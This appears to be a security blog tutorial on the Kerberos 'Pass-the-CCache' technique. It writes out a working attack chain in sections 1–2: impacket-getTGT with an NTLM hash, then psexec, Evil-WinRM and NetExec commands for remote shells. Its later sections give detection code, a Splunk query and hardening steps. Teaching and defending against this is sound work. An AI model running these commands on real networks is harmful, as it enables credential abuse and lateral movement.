
Introduction:
The “Pass-the-CCache” technique is a sophisticated credential access and lateral movement method that allows attackers to authenticate to services across an Active Directory (AD) environment without needing a user’s plaintext password or their NTLM hash. This is achieved by exploiting the Kerberos authentication protocol, where an attacker steals or generates a valid Ticket-Granting Ticket (TGT) saved as a `.ccache` file, which acts as a bearer token. By leveraging tools like Impacket and Evil-WinRM, an adversary can use this ticket to gain unauthorized access to remote systems, moving laterally with a low detection footprint.
Learning Objectives:
- Understand the core principles of Kerberos authentication and how the `.ccache` ticket file can be weaponized.
- Execute a complete attack chain using Impacket to convert an NTLM hash into a reusable TGT and use it for lateral movement.
- Implement defensive measures, including event log monitoring and Kerberos hardening, to detect and mitigate this technique.
You Should Know:
1. Exporting the Ticket: Converting a Hash into a Pass-The-Ticket
Before an attacker can move laterally, they must first obtain a reusable Kerberos ticket. This is done by converting a compromised NTLM hash (often obtained from a previous attack like a hash dump) into a TGT. The Impacket tool `getTGT.py` facilitates this by communicating directly with the Key Distribution Center (KDC).
Step-by-step guide explaining what this does and how to use it:
The attacker first configures their attacking machine (e.g., Kali Linux) by editing the `/etc/krb5.conf` file to define the Kerberos realm and the domain controller. The host file is also updated to resolve the domain controller’s hostname to its IP address.
Once the environment is prepared, the attacker executes the following command to request a TGT using a compromised NTLM hash, which is saved as a `.ccache` file. This effectively transforms a stolen hash into a ticket that can be used for authentication.
Configure krb5.conf with the target domain and KDC (`sudo nano /etc/krb5.conf`) and add the following:

```ini
[libdefaults]
    default_realm = IGNITE.LOCAL

[realms]
    IGNITE.LOCAL = {
        kdc = dc.ignite.local
    }

[domain_realm]
    .ignite.local = IGNITE.LOCAL
    ignite.local = IGNITE.LOCAL
```

Map the domain controller's IP and request the TGT; the command creates a file named `Administrator.ccache`:

```bash
# Map the domain controller's IP
echo "192.168.1.11 dc.ignite.local" | sudo tee -a /etc/hosts

# Request a TGT using an NTLM hash; the ticket is written to Administrator.ccache
impacket-getTGT -dc-ip 192.168.1.11 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator
```
After the ticket is generated, the attacker sets the `KRB5CCNAME` environment variable to point to the `.ccache` file. This variable tells any Kerberos-aware tool to use this ticket for authentication, effectively loading the credentials into the current session.
```bash
export KRB5CCNAME=Administrator.ccache
```
2. Moving Laterally with Impacket and Evil-WinRM
With the Kerberos ticket loaded, the attacker can now move laterally to other machines on the network. Several tools can leverage this ticket for remote code execution. Impacket’s `psexec` is a common choice, as it uploads a service to the target’s `ADMIN$` share to gain a SYSTEM shell. The `-k` flag tells the tool to use Kerberos authentication, and `-no-pass` indicates that no password or hash will be provided.
```bash
# Using Impacket PsExec for a SYSTEM shell
impacket-psexec ignite.local/[email protected] -k -no-pass
```
Evil-WinRM is another powerful shell that supports Kerberos authentication directly using the `.ccache` file via the `-K` flag. This provides an interactive PowerShell session on the remote Windows machine.
```bash
# Gaining a PowerShell session with Evil-WinRM using the ccache file
evil-winrm -i dc.ignite.local -r IGNITE.LOCAL -K Administrator.ccache
```
Finally, the modern NetExec framework (successor to CrackMapExec) can also use the cached ticket with the `--use-kcache` flag. This allows the attacker to execute commands over SMB or WMI without ever providing a password or hash.

```bash
# Using NetExec over SMB
nxc smb 192.168.1.11 -u administrator --use-kcache -x whoami

# Using NetExec over WMI (alternative port)
nxc wmi 192.168.1.11 -u administrator --use-kcache -x ipconfig
```
3. How to Detect Pass-the-CCache Activity
Defenders can identify this attack by monitoring for specific anomalies in Kerberos traffic and Windows event logs. A key indicator is an unusual Kerberos TGT request (AS-REQ) coming from a non-domain-joined machine. Additionally, security teams should look for the presence of the RC4 encryption type in Kerberos tickets, as its use is often a sign of an attacker leveraging an NTLM hash rather than a modern AES key.
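The two indicators above map directly onto fields of Windows Security Event ID 4768 (a Kerberos TGT was requested): `TicketEncryptionType` (0x17 is RC4-HMAC, 0x12 is AES256) and `IpAddress`. The following Python is an added example, not code from the original post: it scores constructed 4768 records against a constructed inventory of domain-joined hosts and reports requests that are RC4-encrypted or come from an unknown source.

```python
"""Added example, not from the original post: score Windows Security Event
4768 (Kerberos TGT requested) records on the two indicators the text names,
an RC4 ticket encryption type and a request from a non-domain-joined host.
The host inventory and the event lines below are constructed."""
from dataclasses import dataclass
from typing import Optional

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC (what an NTLM-hash-based TGT request yields)

# Constructed inventory of domain-joined hosts; a real rule would pull this from AD or a CMDB.
DOMAIN_JOINED = {"192.168.1.11", "192.168.1.20", "192.168.1.21"}

@dataclass(frozen=True)
class Finding:
    user: str
    ip: str
    reasons: tuple

def parse_4768(line: str) -> dict:
    """Parse a constructed key=value rendering of the 4768 fields a SIEM exposes."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["TicketEncryptionType"] = int(fields["TicketEncryptionType"], 16)
    fields["Status"] = int(fields["Status"], 16)
    return fields

def assess(event: dict) -> Optional[Finding]:
    """Return a Finding for a successful TGT request that shows at least one indicator."""
    if event["Status"] != 0:  # failed requests (e.g. bad pre-auth) are a different hunt
        return None
    reasons = []
    if event["TicketEncryptionType"] == RC4_HMAC:
        reasons.append("rc4-tgt")
    src = event["IpAddress"].removeprefix("::ffff:")  # 4768 logs IPv4 as IPv4-mapped IPv6
    if src not in DOMAIN_JOINED:
        reasons.append("non-domain-joined-source")
    return Finding(event["TargetUserName"], src, tuple(reasons)) if reasons else None

def hunt(lines) -> list:
    """Run assess() over raw event lines and keep only the hits."""
    return [f for f in (assess(parse_4768(line)) for line in lines) if f]

# Constructed sample: an AES logon from a known workstation, a failed request,
# and an RC4 TGT for Administrator from an address not in the inventory.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=alice IpAddress=::ffff:192.168.1.20 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=bob IpAddress=::ffff:192.168.1.21 TicketEncryptionType=0x12 Status=0x18",
    "EventID=4768 TargetUserName=Administrator IpAddress=::ffff:192.168.1.50 TicketEncryptionType=0x17 Status=0x0",
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_4768):
        print(finding)
```

In a real environment the RC4 indicator produces noise until AES-only encryption is enforced domain-wide, so correlate it with the source-host check rather than alerting on it alone.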
4. How to Mitigate Pass-the-CCache Attacks
Mitigation focuses on restricting how Kerberos tickets can be used and protecting privileged credentials. A primary defense is to enforce AES-only Kerberos encryption for all domain accounts. This prevents attackers from using NTLM hashes (which rely on the weaker RC4 cipher) to request TGTs.
Other critical hardening steps include:
- Enable Credential Guard: On Windows 10 and Server 2016+, this protects the LSASS process, making it harder for attackers to dump NTLM hashes in the first place.
- Restrict Administrative Logons: Use jump servers or Privileged Access Workstations (PAWs) to limit where high-privilege accounts can authenticate from.
- Monitor for Service Creation: Track Windows Event ID 7045, which logs the creation of new services—a telltale sign of PsExec usage.
5. Proactive Hardening: Restricting Kerberos Ticket Lifetimes and Encryption
For system administrators, proactive hardening of the Kerberos policy is the most effective long-term defense. This involves configuring the domain’s Group Policy to enforce stricter settings.
Step-by-step guide for hardening Kerberos:
- Open the Group Policy Management Console (GPMC) and edit the Default Domain Policy.
- Navigate to Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Kerberos Policy.
- Set “Enforce user logon restrictions” to Enabled to validate every ticket request against the user’s account restrictions.
- Configure “Maximum lifetime for user ticket” (TGT) to a lower value, such as 8-10 hours, to limit the window of opportunity for a stolen ticket.
- To enforce AES encryption, use a PowerShell script to identify accounts that still accept RC4 (weak encryption). While a global policy is ideal, a script can help audit compliance.

```powershell
# Find enabled user accounts with neither AES bit set in msDS-SupportedEncryptionTypes.
# The attribute is a bitmask: 4 = RC4-HMAC, 8 = AES128, 16 = AES256, so 24 = AES128 + AES256.
# An unset attribute ($null) also fails the -band test; such accounts fall back to the domain default.
Get-ADUser -Filter {Enabled -eq $true} -Properties msDS-SupportedEncryptionTypes |
    Where-Object { -not ($_.'msDS-SupportedEncryptionTypes' -band 24) } |
    Select-Object Name, UserPrincipalName, 'msDS-SupportedEncryptionTypes'
```

Accounts with neither AES bit set (the combined value 24) are potentially vulnerable. A follow-up script can then set the `msDS-SupportedEncryptionTypes` attribute to force AES.
6. Blue Team: Hunting for Lateral Movement with Event Logs
A proactive Blue Team can hunt for this technique by correlating specific Windows Security Event IDs. The following Splunk query is designed to detect the use of NetExec, a common tool in these attacks, by looking for its command-line arguments.
```spl
index=windows sourcetype=WinEventLog:Security EventCode=4688
    (Process_Name="*nxc.exe" OR Command_Line="* smb *" OR Command_Line="* wmi *")
    Command_Line="* -u *" Command_Line="* --use-kcache *"
| table _time, Host, User, Process_Name, Command_Line
| sort - _time
```

This search filters for process creation events where the executable is `nxc.exe` or where the command line contains SMB or WMI references alongside the `-u` and `--use-kcache` flags (the wildcards are required because Splunk field matches are exact, not substring, without them). Detecting such an event in the environment is a strong indicator of malicious Kerberos ticket abuse.
What Undercode Say:
- The Pass-the-CCache technique demonstrates that a stolen NTLM hash is a critical first step; protecting credential storage (like LSASS) is paramount.
- A robust defense-in-depth strategy must include Kerberos hardening (enforcing AES, reducing ticket lifetimes) to limit the blast radius of any single compromised credential.
- Active detection using EDR and SIEM rules, focused on anomalous Kerberos requests and administrative tool usage, is essential to catch this type of attack during the lateral movement phase.
Prediction:
As more organizations transition to cloud and hybrid identities, Kerberos-based attacks like Pass-the-CCache will remain a critical threat. Attackers will continue to abuse legacy protocols (like RC4) in mixed-mode environments. The future of defense lies in aggressive deprecation of weak encryption ciphers and the implementation of real-time identity threat detection solutions that can correlate authentication attempts across both on-premises and cloud infrastructure.
Reported By: Pass The – Hackers Feeds